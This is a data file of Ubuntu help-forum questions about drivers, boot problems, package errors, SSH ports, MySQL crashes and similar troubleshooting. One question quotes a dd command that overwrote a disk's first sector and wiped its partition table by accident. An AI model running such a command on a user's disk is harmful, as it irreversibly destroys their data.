507528	nvdia sli with prime and flickering	i have a lenovo y510p with nvidia gt750m sli . when both cards plugged in , prime does not work . `` lspci | grep -i `` vga '' '' command shows only nvidia card . but when i plugged out the second card , prime became active and lspci command shows intel gpu . so is it possible to use both cards with prime or is it not supported ? i am using nvidia drivers from ubuntu repo . if nvidia doesnt support this , is bumblebee supports ? and when both cards plugged in , the screen flickers a little but it 's very annoying . especially in darker colours and in low brightness . the flickering also happens when only one card plugged in too .
507530	fn+pgup ( home ) button key in fujitsu lifebook ph521 is not working on ubuntu 14.04-01	i installed a fresh ubuntu 14.04 64bit on my 2 years old laptop ( fujitsu lifebook ph521 ) it is an amd e-450 powered laptop . everything is working right , except the `` home '' ( fn+pgup ) and `` end '' ( fn+pgdn ) button on the keyboard that is half working . right after logging in to desktop ( unity ) , it only works once for both keys . for example : i opened up a terminal with ( ctrl-alt-t ) then type something on the prompt . and then hit fn+pgup ( home ) and the cursor would jump to the beginning of the line . then i hit fn+pgdn ( end ) and the cursor would jump to the end of the line . after that , i hit fn+pgup ( home ) again , and the cursor would not move anymore . after spending 2 days googling and scouring the forums , i 've tried these before asking this question on askubuntu.com : run xev and the fn+pgup , fn+pgdn does n't produce any event . run showkey as root , and the fn+pgup would produce press event with 102 code , but no release event . the fn+pgdown would produce press event with code 107 , and no release event as well . hit ctrl-alt+f1 to open non-x console to test the key , and both fn+pgup and fn+pgdn works flawlessly there . add hwdb.d config ( fujitsu-keyboard.hwdb ) to synthesize the release event for the fn+pgup and fn+pgdn in /etc/udev/hwdb.d/ with this content : # lifebook ph521 keyboard : dmi : bvn* : bvr* : bd* : svnfujitsu* : pn*lifebook*ph521* : pvr* keyboard_key_66= ! home keyboard_key_6b= ! end then run udevadm hwdb -- update as root and rebooted . other fn+key combination works fine such as volume up/down , brightness up/down so this is really weird . if anyone can help me , i 'd really appreciate it . much thanks .
507531	skype crash on start up after update	i recently updated skype from 4.2 to 4.3 . now skype always crashes immediately after starting without any error message . i am using ubuntu 12.04 .
507532	how to unzip call_of_duty_mw2.zip file	i have call_of_duty_mw2.zip and i want to install it with playonlinux , but i could not find a way to unzip it . first , i tried extracting call_of_duty_mw2.zip , but it always gave me the same error : `` an error occured while loading the archive . '' i looked it up and every site said that i had to use the unzip utility , so i downloaded it via terminal . but now , when i run unzip call_of-duty_mw2.zip it always gives me this error : archive : call_of_duty_mw2.zip end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . unzip : can not find zipfile directory in one of call_of_duty_mw2.zip or call_of_duty_mw2.zip.zip , and can not find call_of_duty_mw2.zip.zip , period . i tried looking it up but could not find a solution .
507533	how to install ubuntu touch on my mobile sony xperia ray	i have mobile `` sony ericson xperia ray st18i '' . i 'm damn interested in installing ubuntu touch on this mobile , but ca n't find my device in ubuntu supported device list . can you please update me if i can install this on my mobile , also provide me some urls helpful to me regarding installing/configuring ubuntu on my xperia ray mobile .
507534	live boot cd homeworking	apologies first off as i am very new to the whole linux world so please be patient with me . i have outlined below what i want to do and want to know what is the best software and best way to do this . we have approx 200 users who work from home and they currently have a dedicated hp thin client dispatched to them so they can connect to a cisco vpn and in turn connect to a citrix gateway where they then connect to a vdi . what i would like below : - ) we want to do away with having to dispatch users hardware for this and have them use their existing pc 's , laptops etc at home by booting off a usb/cd to enter a live environment where in turn they can do the same as above . basically this is a cost saving exercise as the logistics and upkeep of the hardware is pretty expensive . i am a quick learner and willing to try anything to get this working . if there is a dummies guide to generally doing this then please point me to it : - ) your help on this matter would be greatly appreciated and i am excited as to what replies i get . thanks darren
507535	keep getting internal system errors and can not see the desktop	i have found quite a few topics within this problem , but did n't really find a clear answer . i have updated my ubuntu . the update i have installed ubuntu update center said it had some unothorized installs . i have read , that people get these messages , but what you need to do is run sudo apt-get update and then sudo apt-get upgrade . so that was what i did . after i restarted the computer , i received this `` internal system problem '' . tried to restart computer quite few times , but still the same . the thing is that i can not see the desktop as well , no icons , no nothing .
507536	how to re-create the partition table ?	i accidentally dd the first 512 bytes using dd if=/dev/zero of=/dev/sdb bs=512 count=1 and the partition table is now gone . is there any way to re-create the partition table ( /dev/sdb ) . my hard drive is 2x2tb soft raid ( gpt partition table ) root @ rescue : / # parted -l model : ata hgst hus724020al ( scsi ) > disk /dev/sda : 2000gb sector size ( logical/physical ) : 512b/512b partition table : gpt disk flags : number start end size file system name flags 1 20.5kb 1049kb 1029kb primary bios_grub 2 2097kb 1987gb 1987gb primary 3 1987gb 1992gb 5242mb ext4 primary 4 1992gb 2000gb 8388mb linux-swap ( v1 ) primary error : /dev/sdb : unrecognised disk label model : ata hgst hus724020al ( scsi ) > disk /dev/sdb : 2000gb sector size ( logical/physical ) : 512b/512b partition table : unknown disk flags : any help would be much appreciated .
507538	no `` date and time '' gui tab	the time is displayed on the top panel on my ubuntu 13.10 . when i click there , a menu opens as usual . but , when i click on `` date and time settings '' , it does not open `` date and time '' window , rather `` all settings '' window opens . i found that there is no `` date and time '' option under `` all settings '' . i can find many commands on internet to change date and time from terminal . but how to bring the `` time and date '' tab back ?
507540	ca n't play encrypted dvd on internal dvd-drive , but ok with usb-dvd-drive	as stated in the title , i ca n't play any commercial dvd on my internal dvd-drive on my laptop , but everything works just fine for the same dvd played on an external ( usb ) dvd-drive . i 've installed ubuntu-restricted-extras and used the usual script : sudo /usr/share/doc/libdvdread4/install-css.sh i might add that this problem is encountered on 3 different laptops , so it 's not a physical problems on my machines ( hopefully ; ) ) . thanks to anyone who would have a solution ... : )
507541	trouble with installing nvidia driver and cuda toolkit	i installed nvidia driver as following ( as far as i can recall correctly ) into a fresh ubuntu 12.04 system : apt-get install nvidia-current reboot ./nvidia-linux-x86_64-340.24.run ( in virtual terminal ) reboot oops , all i got was a blank screen and a blinking cursor . after toiling a few days ... . apt-get remove -- purge nvidia* result : purge : ubuntu-desktop : amd64 ( 1.267.1 ) , nvidia-common : amd64 ( 0.2.44.2 ) , nvidia-304 : amd64 ( 304.116-0ubuntu0.0.1 ) , nvidia-current : amd64 ( 304.116-0ubuntu0.0.1 ) , nvidia-settings : amd64 ( 331.20-0ubuntu0.0.1 ) hooray , the login screen is back . then i reinstalled the x server : apt-get install nvidia-settings i need cuda for another thing i am working on . but things would n't compile . decided to read getting started with cuda pdf and managed to compile the cuda samples after messing around for a few hours ( problems with paths and .so ) . then tried running the first sample , devicequery . i get the following error : cudagetdevicecount returned 35 - > cuda driver version is insufficient for cuda runtime version so now i am stuck here . some diagnostic info : lspci -v | grep -i nvidia 01:00.0 vga compatible controller : nvidia corporation g96 [ quadro fx 580 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 063a kernel driver in use : nvidia kernel modules : nvidia , nouveau , nvidiafb nvidia-settings -q nvidiadriverversion 331.62 ( same as reported by nvidia-smi and x-server ) cat /proc/driver/nvidia/version nvrm version : nvidia unix x86_64 kernel module 331.62 wed mar 19 18:20:03 pdt 2014 gcc version : gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) dpkg -l | grep nvidia ii nvidia-settings 331.20-0ubuntu0.0.1 tool for configuring the nvidia graphics driver probably i should n't have used apt-get in the first place , but i have removed the packages ( except nvidia-settings ) . the driver should be the latest , no ? what can i do now ? help !
507545	desktop not visible in ubuntu14.04	i installed ubuntu 14.04 in vmware . after logging in i 'm only getting the wallpaper , no desktop icons are showing up . i tried sudo apt-get install ubuntu-desktop sudo apt-get install unity startx none of these work . please help me with the issue .
507549	/usr/bin/ld : can not find -lglui ubuntu trusty 14.04	/usr/bin/ld : can not find -lglui ubuntu trusty 14.04 just searched throught the internet and i couldnt find any solution for this problem . thank you for your time and help http : //packages.ubuntu.com/lucid/i386/libglui-dev/download just installed this using ubuntu software center and the problem solved
507550	reason of removing apt/dpkg/lock & apt/archives/lock	is it possible to install multiple packages by deleting `` using apt & dpkg in the same time `` . dpkg/lock & /archives/lock the ubuntu developers made it for reason `` that you can not install multiple packages '' . so my question is : deleting the lock file is it a consequence or just a triviality '' maybe if you include a reason will make it so easy to understand ''
507551	symbolic links to windows and ubuntu programs	i am currently running a dual boot system ( windows 7 and ubuntu 14.04 ) on an 250gb ssd . about 2/5 for windows , 3/5 for ubuntu . i also have a 1tb hdd for storage formatted in ntfs where i have symbolic links to my /pictures , /videos , from both oses so i can share the files . all this is outlined in this how to . i 'm starting to run out of space on both partitions of my ssd , mainly due to programs . i have seen people creating symbolic links to programs in ubuntu , but i do n't know how to do this on windows . i would like to link some less frequently used programs from both oses to my 1tb hdd . my questions are : what file format do i need to use on my hdd to keep an executable there ? for windows ? for ubuntu ? how do i mount all these partitions on startup ? thanks in advance .
507552	32-bit pae - only 2 gb of ram recognized , 4 gb installed	ok , there are a lot of this question and still i do n't have an answer , so maybe i give it a shot asking the question . i recently bought a 2 gb ram and put it into another dimm slot . so now i have 4 gb , which on 2 gb module each . i am using 14.04 32 bit . bios recognizes 4 gb , not memtest , not livecd , not inside os itself . lshw recognizes a total of 4 gb , max 8 gb . cpu is athlon ii p360 , pae is supported . now , gpu is 512 mb , and according to dmesg , gtt / gart is 1 gb enabled i only see 2 gb of total ram . if , and if gpu is tapping into system host , than i still have more than 2 gb ram . i recognize some answer about 32 bit os , but it still has to recognize ram beyond 2 gb . ( almost the answer on the net suggesting pae kernel , it 's not necessary anymore ) . also , i , in turn , took of each module to test , and it both works , and the system still only recognize 2 gb ram . any ideas ?
507555	a qdbus command error	why do i get an error with this command in kde : qdbus org.kde.klipper /klipper getclipboardcontents qdbus : could not exec '/usr/lib/x86_64-linux-gnu/qt5/bin/qdbus ' : no such file or directory ?
507556	lenovo b480 laptop	i have successfully installed ubuntu 14.10 64 bit os on lenovo b480 processor . but , presently , i am having `` finger-print '' reader configuration error . as suggested , i have followed below documentation to configure finger-print device . http : //tryitnw.blogspot.gr/2013/02/easy-steps-to-enable-finger-print.html http : //www.thinkwiki.org/wiki/how_to_enable_integrated_fingerprint_reader_with_fprint the output is as given below . root @ nishith-lenovo-b480 : ~ # lsusb bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0c45:6459 microdia bus 001 device 003 : id 147e:1002 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 005 : id 058f:6387 alcor micro corp . flash drive bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 006 : id 1058:1023 western digital technologies , inc . elements se bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub root @ nishith-lenovo-b480 : ~ # fprintd-enroll list_devices failed : no devices available
507557	bash : ./configure : no such file or directory while installing ffmpeg	i am trying to install ffmpeg in ubuntu 14.04 . i got help to install ffmpeg installation in meanwhile i got an error `bash : ./configure : no such file or directory` i am getting this error when i try to run this command ./configure -- prefix= '' $ home/ffmpeg_build '' -- extra-cflags= '' -i $ home/ffmpeg_build/include '' -- extra-ldflags= '' -l $ home/ffmpeg_build/lib '' -- bindir= '' $ home/bin '' -- enable-gpl -- enable-libass -- enable-libfaac -- enable-libfreetype -- enable-libmp3lame -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-libx264 -- enable-nonfree -- enable-x11grab here is the ls -la output : m-usman @ muhammad-usman : ~/ffmpeg_sources/ffmpeg-0.9.2 $ ls -la drwxr-xr-x 16 m-usman m-usman 4096 aug 6 14:25 . drwxrwxr-x 10 m-usman m-usman 4096 aug 6 14:38 .. -rw-r -- r -- 1 m-usman m-usman 162704 may 3 2012 avconv.c -rw-r -- r -- 1 m-usman m-usman 36942 may 3 2012 cmdutils.c -rw-r -- r -- 1 m-usman m-usman 1284 may 3 2012 cmdutils_common_opts.h -rw-r -- r -- 1 m-usman m-usman 11858 may 3 2012 cmdutils.h -rw-r -- r -- 1 m-usman m-usman 3275 may 3 2012 common.mak -rw-rw-r -- 1 m-usman m-usman 421 aug 6 14:34 config.fate -rw-rw-r -- 1 m-usman m-usman 137030 aug 6 14:34 config.log -rwxr-xr-x 1 m-usman m-usman 114524 may 3 2012 configure -rw-r -- r -- 1 m-usman m-usman 18092 may 3 2012 copying.gplv2 -rw-r -- r -- 1 m-usman m-usman 35147 may 3 2012 copying.gplv3 -rw-r -- r -- 1 m-usman m-usman 26528 may 3 2012 copying.lgplv2.1 -rw-r -- r -- 1 m-usman m-usman 7651 may 3 2012 copying.lgplv3 -rw-r -- r -- 1 m-usman m-usman 1038 may 3 2012 credits drwxr-xr-x 3 m-usman m-usman 4096 may 3 2012 doc -rw-r -- r -- 1 m-usman m-usman 68481 may 3 2012 doxyfile -rw-r -- r -- 1 m-usman m-usman 185387 may 3 2012 ffmpeg.c -rw-r -- r -- 1 m-usman m-usman 107664 may 3 2012 ffplay.c drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 ffpresets -rw-r -- r -- 1 m-usman m-usman 41085 may 3 2012 ffprobe.c -rw-r -- r -- 1 m-usman m-usman 159009 may 3 2012 ffserver.c -rw-r -- r -- 1 m-usman m-usman 564 may 3 2012 install drwxr-xr-x 13 m-usman m-usman 24576 may 3 2012 libavcodec drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 libavdevice drwxr-xr-x 4 m-usman m-usman 4096 may 3 2012 libavfilter drwxr-xr-x 2 m-usman m-usman 12288 may 3 2012 libavformat drwxr-xr-x 10 m-usman m-usman 4096 may 3 2012 libavutil drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 libpostproc drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 libswresample drwxr-xr-x 7 m-usman m-usman 4096 may 3 2012 libswscale -rw-r -- r -- 1 m-usman m-usman 2005 may 3 2012 license -rw-r -- r -- 1 m-usman m-usman 19678 may 3 2012 maintainers -rw-r -- r -- 1 m-usman m-usman 4459 may 3 2012 makefile drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 mt-work drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 presets -rw-r -- r -- 1 m-usman m-usman 164 may 3 2012 readme -rw-r -- r -- 1 m-usman m-usman 6 may 3 2012 release -rw-r -- r -- 1 m-usman m-usman 3383 may 3 2012 subdir.mak drwxr-xr-x 4 m-usman m-usman 4096 may 3 2012 tests drwxr-xr-x 2 m-usman m-usman 4096 may 3 2012 tools -rw-r -- r -- 1 m-usman m-usman 6 may 3 2012 version -rwxr-xr-x 1 m-usman m-usman 1419 may 3 2012 version.sh how can i fix it ?
507559	what is the root user	if you use sudo su - or sudo -s you will get the full root certification `` likewise a root user `` . is this user an official user or is it from canonical ? ~ $ sudo su - [ sudo ] password for username : root @ lp : ~ # id uid=0 ( root ) gid=0 ( root ) groups=0 ( root ) root @ lp : ~ # pwd /root root @ lp : ~ #
507564	ricoh mpc3300 printing sheet per sheet on ubuntu 14.04	i have installed the ricoh mpc3300 printer on my laptop . used the choose from database option and chose for the mpc 3300 . the drivers works but is very slow . it seems to be printing a sheet dan wait a while prints a sheet again ... how can i fix this ? kr , joeri
507565	can i run ubuntu 12.04.5 with 3.8 kernel and still have kernel security updates ?	my 12.04 is asking me to update the hwe layer , but when i 've made it last time all my vm stopped working correctly because of a bug in the 3.13 kernel . so i have reinstalled a clean 14.04 but the kvm machines still does n't work . at the end i have reinstalled the full system with a clean 12.04.5 lts version that is still asking me to update the hwe layer . i want to update the hwe layer to have the lts support but i do n't want to use the 3.13 kernel but continue using the 3.8 kernel . if it 's impossible , i have to remove ubuntu and go on another distribution . the kvm machines are fundamental to my work and i ca n't work without them . the 3.13 kernel is unusable with kvm machines ( the cpu goes 100 % and the disk led remains on with the disk using the maximum i/o ) . the vm are very slow and mostly not usable ( on a vm with windows 7 the simple login can take 5 minutes when it takes 1 second with 3.8 kernel ) . with the 12.04.5 i can use the vm normally with a little cpu usage and a very low disk i/o profile . so the problem is clearly the kernel 3.13 and i do n't want to use it . i found very annoying that for an lts version the hwe is not maintained any more and that i 'm forced to do an upgrade to an unusable 14.04 to be able to have the updates ( i 've found many other things that do n't work well on 14.04 , for example the gdm that has syntax errors in the service scripts ) . so it 's simple , i want keep the 12.04.5 until the next stable release but i do n't want use the 14.04 because has not reached the same quality level of the 12.04 and i do n't want to reinstall the system just to try if the vm works . so how to remove the annoying hwe update messages and continue to use the 3.8 kernel with my 12.04.5 lts ? ( keeping the security updates of course )
507573	how do i get a zte mf667 usb modem working ?	i 'm using internet through usb modem ( zte mf667 ) , and it was working fine ( on ubuntu 13.04 and 13.10 ) until i installed ubuntu 14.04 . now , i ca n't use it at all . it just demanding a pin ( that i have ) and after that nothing !
507576	any way to get nvidia optimus card working on 14.04.1 ?	my nvidia graphic card has optimus technology and as far as i can see it is not working , not even recognized . on system settings details it says intel haswell mobile on graphic section . also on startup i get a screen saying unknown chipset with some numbers which seems to be associated with this issue . is there any way to make it work on 14.04.1 ? i have seen bumblebee suggestions but does it work on the last version of ubuntu ? thanks .
507577	wallpaper not showing on login screen	problem i have a custom wallpaper as my desktop background , but it does n't show up on the login screen and the default ubuntu unity `` greeter '' is shown . past cases in the past , they used to show up on the login screen too . for example , my very first wallpaper was of elsa from frozen , and then something else from an anime bleach . they showed up when i booted the pc and stayed there as i entered the password . clarifications i have n't done any major changes to my system . it 's ubuntu 13.10 ( do n't give me that support has ended thing , it 's merely a technical problem that can be solved ) . i also tried putting that picture in the wallpapers directory ( home/pictures/wallpapers ) . why this is not a duplicate how do i add customized wallpapers so they appear in the dynamic unity greeter ? is about adding an image to the default directory so that they can be changed via right click > change desktop . how to change login wallpaper ? is about having a separate image for background and another for the login screen . gradients backgrounds gives default wallpaper on login screen . is about another default wallpaper and it not showing , instead having the default wallpaper . desktop background does n't show up on logon screen [ duplicate ] is a duplicate that leads to the first question i mentioned here . and they 're all i could find in the search .
507580	how to boot ubuntu automatically ?	i am using ubuntu gnome 13.10 . i have made one backup image with clonezilla . the backup includes 2 partitions — one is /dev/sda1 , where is the efi ( only the efi folder from /boot/efi/efi ) , and the other is /dev/sda2/ , where is my root directory with all other files ( / ) . i have installed the os through efi . everything was fine — i could restore my backup without any problems . but i bought new hard disk drive , because of failure of the old one . i installed the new hard disk and everything was fine again , except one thing . i am restoring the backup without any problems , but after the post screen the os is not booting — it opens the grub command-line interface every time ! i boot the os with the following commands : linux ( hd0 , gpt2 ) /vmlinuz root=/dev/sda2 initrd ( hd0 , gpt2 ) /initrd.img boot the os boots , but on the screen i see this error : the disk drive /boot/efi is not ready yet or not present . okay , i have found the solution for this — the os boots in bios mode , not in efi and i removed the efi line in /etc/fstab . the error does not show on the screen anymore . but the grub command-line interface starts before the os every time . and i need to load the kernel manually on every startup . how to make the os start automatically ? and how to make the os to boot in efi again ( it is not mandatory , but i am searching for a solution ) ? thank you !
507582	cups , shared printer , windows drivers , point and print	i know this is a commonly asked question but i 'm read up everything i can find , and i think i 'm very nearly there ! the setup is : headless ubuntu trusty machine with cups and samba installed , ready to act as a print server for a network printer . using the web interface , cups discovered the network printer by ip address and i found a pdd file for it somewhere . installs and prints fine from the web interface ; i 've set up sharing and things like black and white default . i 've tried adding the printer to my windows 7 workstation via add network printer , using the format : http : //machinename:631/printers/printername which works fine , but i have to provide the location of the relevant drivers . if i browse to the machine via start > run > \\machinename i can see the printer and connect to it that way too , but again i have to point the installer at the drivers . what i want to deploy is the correct hosting of the drivers inside \\machinename\print $ so that windows finds them when you try to connect to the shared printer . to do this , i explored the print $ share of a windows machine that currently acts as a print server for the same device ( the idea is to replace this windows machine with the ubuntu cups solution ) . in there , i found the expected folders that contained all the driver files , and i copied these to the relevant location on the cups machine . however , even though as a client i can browse and download these drivers , windows still wants the driver location when i connect to the printer . any idea what i 'm missing ? thanks
507583	no usb boot . no cd boot . can i install ubunto on a mac mini ?	i 've been through the answers to similar questions , but they all require usb or cdrom booting . i 've installed efi - it might be that i 've not done that correctly , but it boots in efi , but does n't find the cd or a usb stick . i have got ubuntu running under virtualbox on the mac mini . it 's just horribly slow . is there not some way that i can install bootable ubuntu onto another partition on the same physical drive , so i can dual boot from the same disc , using ubuntu on virtualbox ? i 've been hunting , but i ca n't find any instructions to do this . i 'd be grateful for any pointers .
507584	why when i 'm removing package , apt trying to install 40 extra	removing pulseaudio because alsa can work without it . and i want to make things simpler . those not suggested nor recommended . why apt wants them installed and how to avoid that ? ... suggested packages : content-hub sqlite3-doc recommended packages : unity-scope-click the following packages will be removed : indicator-bluetooth* indicator-sound* libcanberra-pulse* modemmanager* pulseaudio* pulseaudio-module-bluetooth* pulseaudio-module-x11* unity-control-center* unity-control-center-signon* webaccounts-extension-common* the following new packages will be installed : apparmor-easyprof apparmor-easyprof-ubuntu click click-apparmor gir1.2-click-0.4 gir1.2-gee-0.8 gir1.2-json-1.0 gnome-session-bin hud libandroid-properties1 libboost-iostreams1.54.0 libboost-serialization1.54.0 libcapnp-0.4.0 libclick-0.4-0 libcontent-hub0 libdbus-cpp2 libdee-qt5-3 libgflags2 libgoogle-glog0 libhud-client2 libhybris-common1 libjsoncpp0 liblttng-ust-ctl2 liblttng-ust0 libmediascanner-2.0-0 libmirclient7 libmirclientplatform-mesa libmirplatform libmirplatformgraphics-mesa libmirprotobuf0 libmirserver18 libnux-4.0-0 libnux-4.0-common libpgm-5.1-0 libprocess-cpp1 libqdjango-db0 libqmenumodel0 libqt5xmlpatterns5 libubuntu-application-api-mirserver1 libubuntu-location-service0 libubuntu-platform-hardware-api1 libunity-api0 libunity-core-6.0-9 libunity-mir1 libunity-scopes1 libunwind8 libupstart-app-launch2 liburcu1 libusermetricsoutput1 libzeitgeist-2.0-0 libzmq3 libzmqpp3 mediascanner2.0 python-zeitgeist python3-apparmor python3-apparmor-click python3-click python3-libapparmor qmenumodel-qml qtdeclarative5-dee-plugin qtdeclarative5-gsettings1.0 qtdeclarative5-ubuntu-content0.1 qtdeclarative5-ubuntu-settings-components qtdeclarative5-ubuntu-settings-components-assets qtdeclarative5-ubuntu-thumbnailer0.1 qtdeclarative5-unity-notifications-plugin qtdeclarative5-xmllistmodel-plugin sqlite3 thumbnailer-service unity-plugin-scopes unity-scope-mediascanner2 unity-scope-scopes unity8 unity8-private upstart-app-launch upstart-app-launch-tools usermetricsservice zeitgeist zeitgeist-core zeitgeist-datahub 0 upgraded , 80 newly installed , 10 to remove and 10 not upgraded . need to get 17,4 mb of archives . after this operation , 36,1 mb of additional disk space will be used . do you want to continue ? [ y/n ] above the result of both commands sudo apt-get purge pulseaudio sudo apt-get remove -- purge pulseaudio
507585	accidentaly deleted all aliases . how can i restore them ?	i accidentally deleted all aliases with unalias utility . there were some useful aliases that i want back ( with -- color option etc ) , but i do n't want to type them again . is there a simple way to restore them ? edit : i want only the aliases that came with the 14.04 installation .
507587	install ffmpeg-0.9.2 in ubunu 14.04 lts	i try to install ffmpeg 0.9.2 that i want to install i know there is latest version is available bit i want to install this version . please guide me to install ffmpeg 0.9.2 . i already use this to install but i get error to install for this version . thanks in advance .
507588	not able to install tree comand in ubuntu	my ubuntu is running on windows 7 using vmware player . i was try to install tree command . but it failed . could you help me why ? i am using `` sudo app-get install tree '' command and it is failing with e : unable to locate package tree ubuntu version is 14.04 lts ( gnu/linux 3.13.0-24 generic x86_64 ) regards , koushik
507592	how to install an ubuntu server with everything that the ubuntu desktop has ?	how to install an ubuntu server with everything that the ubuntu desktop have ? i am using 14.04 on a fresh server with raid disks
507600	upgraded by accident , what can i do ?	i recently run a update-manager -d and realized that i installed version 14.10 on my desktop . now i saw that it 's only the alpha version . how do i stand the time until the stable version is released ? and what can i do to prevent harm ?
507602	laptop intel hd graphics not detected , only ati is found	i 'm using dell n5010 with dual intel hd vga and ati radeon vga . i have installed fglrx and amdcccle . but linux does n't seems to detect my intel vga but it detects ati card . inxi -g gives following output graphics : card : advanced micro devices [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] x.org : 1.15.1 driver : fglrx resolution : 1366x768 @ 60.0hz glx renderer : amd mobility radeon hd 5000 series glx version : 4.3.12798 - cpc 13.35.1005 lspci -v | grep -i vga gives the following 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] ( prog-if 00 [ vga controller ] ) and mesa-utils is already the newest version what can i do to get intel grapics working ? thanks .
507604	mysql keeps crashing in ubuntu 12.04	every few hours , mysql crashes on my digital ocean ubuntu 12.04 machine . below is the errors i am seeing in my mysql error log . i thought it was a memory issue , so i added a swap , but that did n't fix it . 140806 11:58:57 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140806 11:58:57 [ note ] plugin 'federated ' is disabled . 140806 11:58:57 innodb : the innodb memory heap is disabled 140806 11:58:57 innodb : mutexes and rw_locks use gcc atomic builtins 140806 11:58:57 innodb : compressed tables use zlib 1.2.3.4 140806 11:58:58 innodb : initializing buffer pool , size = 128.0m innodb : mmap ( 137363456 bytes ) failed ; errno 12 140806 11:58:58 innodb : completed initialization of buffer pool 140806 11:58:58 innodb : fatal error : can not allocate memory for the buffer pool 140806 11:58:58 [ error ] plugin 'innodb ' init function returned error . 140806 11:58:58 [ error ] plugin 'innodb ' registration as a storage engine failed . 140806 11:58:58 [ error ] unknown/unsupported storage engine : innodb 140806 11:58:58 [ error ] aborting 140806 11:58:58 [ note ] /usr/sbin/mysqld : shutdown complete here is a look at my memory ( free -m ) : total used free shared buffers cached mem : 2003 384 1619 0 12 50 -/+ buffers/cache : 321 1682 swap : 511 18 493 can someone please help me figure out how i can stop this from happening ?
507605	kiosk type machine - guess account good start	i have some public use pc 's currently setup with 14.04 64bit using the guest account to automatically boot and login . it 's working fine , but i 'd like to make it even more restricted . meaning i 'd like to be sure no one sitting in front of the pc can change anything even if they find a way to boot from a usb drive . encrypting the full install of ubuntu seems like the right path , but that requires either a person to provide a password ( and thus can then decrypt and make changes if they were to boot from usb ) or use a key file . if it 's a key file , then it has to be on the pc itself and if someone looks at the grub startup they can see exactly which file is the key , then the system is vulnerable . of course i 've disabled any bios options available for booting anything but the hard drive , but it 's a mix of older computers and not all bios 's have the same options or the same level of security . ie , you can turn off the option to boot to usb , but can still hit a key to access a boot menu where it will gladly let you boot to usb . these are donated pc 's and there 's no budget to replace them with something more security conscious . again , the guest account is wonderful . i 've setup a basic user , linked it to the guest skel directory so i can set the basic user up and then the guest account copies the basic user account on logon . the guest account also provides a good level of restriction , there 's just simply no permission to even view some things that a normal user can . i just need an extra layer to prevent people , whom are allowed to sit and do nothing in front of a computer all day , from bypassing startup and using anything other than the guest account . i still want/need automatic updates to run and be installed . otherwise i would just have the system pull from a read only image each time it boots . tl ; dr is there any way to protect a system from modification without having to supply a password on startup ? setup as a public terminal so that idle hands can not bypass the boot process and modify the installed os ?
507608	not able to login through root user	i have installed ubuntu 14.04 lts . during installation on my windows pc using vmware player , it asked a username and i provided one . but now after successful installation , i also want to login as the root user . but unfortunately i do n't know how to retrieve the root password or change it . how can i log in as the root user ?
507611	ssh connection failing since i changed server port number	yesterday i changed the default ports on the server from 22 to 1993 then restarted but now i ca n't connect at all . i used ssh -i keyname.pem ubuntu @ remotehost to connect then sudo vi /etc/ssh/sshd_config to change the ports . after that i restarted the server using sudo service ssh restart now i ca n't connect at all , if i try ssh -i keyname.pem ubuntu @ remotehost then i get this : ssh : connect to host 12.34.5.678 port 22 : connection refused if i try this ssh -i keyname.pem -p 1993 ubuntu @ remotehost then i get this : ssh : connect to host 12.34.5.678 port 1993 : operation timed out i 've tried ssh -v user @ host and that gives me this : openssh_6.2p2 , osslshim 0.9.8r 8 dec 2011 debug1 : reading configuration data /users/macuser/.ssh/config debug1 : reading configuration data /etc/ssh_config debug2 : ssh_connect : needpriv 0 debug1 : connecting to 12.34.5.678 [ 12.34.5.678 ] port 22. debug1 : connect to address 12.34.5.678 port 22 : connection refused ssh : connect to host 12.34.5.678 port 22 : connection refused i 've also tried to connect using filezilla and all i get with that is : status : connecting to internal.livesite.com ... response : fzsftp started command : keyfile `` /users/macuser/desktop/secure_key '' command : open `` ubuntu @ remotehost '' 22 error : connection refused error : could not connect to server if i just try to connect , but if i change the port to 1993 i get this : status : connecting to internal.livesite.com:1993 ... response : fzsftp started command : keyfile `` /users/macuser/desktop/secure_key '' command : open `` ubuntu @ remotehost '' 1993 error : connection timed out error : could not connect to server i 'm desperate to get this sorted as my boss wants to go through everything with me and i ca n't upload any changes until this is done . i 'd be so grateful for any help .
507614	ubuntu 14.04 on acer 5920g : impossible activate hardware acceleration with geforce gt 8600m	i 'm trying to install ubuntu on acer 5920g , but it 's extremely slow , sice the video card gt 8600m have no hardware acceleration . i tried to install several versions of proprietary driver from official repository , and i tried to remove nouveau driver , but just few times the driver worked properly ( after first reboot ) , and afer another reboot it stop work again . i also tried latest nvidia package from nvidia site , but also there i was not able to make it work . the strange thing is that ubuntu in live mode run smooth using nouveau but once installed it 's very very slow . i also tried to use fedora , and videocard work great with nouveau ! ! ! ( also supertuxkart run smoot ! ) someone can suggest me how to make nouveau or nvidia driver work on ubuntu ?
507615	empathy voice/video chats with xmpp	what i must install that use voice/video chats in empathy via xmpp with openfire server ? thanks for helping .
507618	running `` internet download manager '' via wine crashes	i have installed wine-1.7.22 then installed play on linux too , which uses wine then i installed internet download manager 5.17 using play on linux it installed successfully , i opened it and add url to it the download window appears click start download the download crashed but main idm window keep running tried resuming but same problem anyone know how to fix , or i am missing something . i am using ubuntu 14.04 lts version 64 bit .
